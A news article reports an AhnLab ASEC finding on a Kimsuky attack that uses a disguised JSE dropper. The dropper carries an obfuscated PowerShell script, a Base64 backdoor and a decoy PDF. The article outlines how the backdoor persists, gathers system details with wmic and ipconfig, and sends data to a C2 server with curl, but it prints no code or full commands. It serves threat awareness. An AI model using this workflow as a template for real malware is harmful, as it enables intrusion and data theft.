Cybersecurity researchers from AhnLab Security Emergency Response Center (ASEC) have exposed this recent attack tactic by Kimsuky. The threat actor also deploys a sophisticated backdoor to steal sensitive information and execute malicious commands on the compromised systems.
The disguised dropper, ‘Import Declaration_Official Steamp Affixed.jse’, contains an obfuscated PowerShell script, a Base64-encoded backdoor file, and a seemingly legitimate PDF file named ‘Import Declaration.PDF’. Including a genuine PDF file is a strategic move by the threat group to mask the malicious activity, making it less conspicuous to users.
Behind the scenes, the backdoor is created in the %ProgramData% path with the filename ‘uVvMKg.i3IO,’ and it is executed using rundll32.exe with a PowerShell command.
The malware ensures persistence by copying itself into both the %ProgramData% and %Public% paths under the filename ‘IconCache.db’ and registering itself with the task scheduler.
To exfiltrate sensitive system information, the backdoor employs commands such as wmic to check the anti-malware software, if any, and ipconfig to collect network details. The gathered data includes the hostname, user name, and OS information. To avoid detection, the malware encodes the command execution results before sending them to its command-and-control (C2) server.
The backdoor exhibits various functionalities, including system information retrieval, termination commands, execution path exploration, and the ability to run specific files and commands. Notably, the curl tool is utilised to send the data to the C2 server, emphasising the threat group’s advanced tactics.
One of the concerning aspects of this attack is the camouflage provided by the bait file, preventing users from easily identifying the infection. As these types of malware typically target specific entities, the researchers advise users to exercise caution when dealing with email attachments from unknown sources.
DPRK-based hackers have been unleashing chaos all over the world. In January, the FBI confirmed that Lazarus was behind the Harmony Horizon hack where the threat actor stole $63.5 million worth of crypto.
In September, Google’s Threat Analysis Group came out with a report detailing the involvement of North Korean hackers in targeting journalists.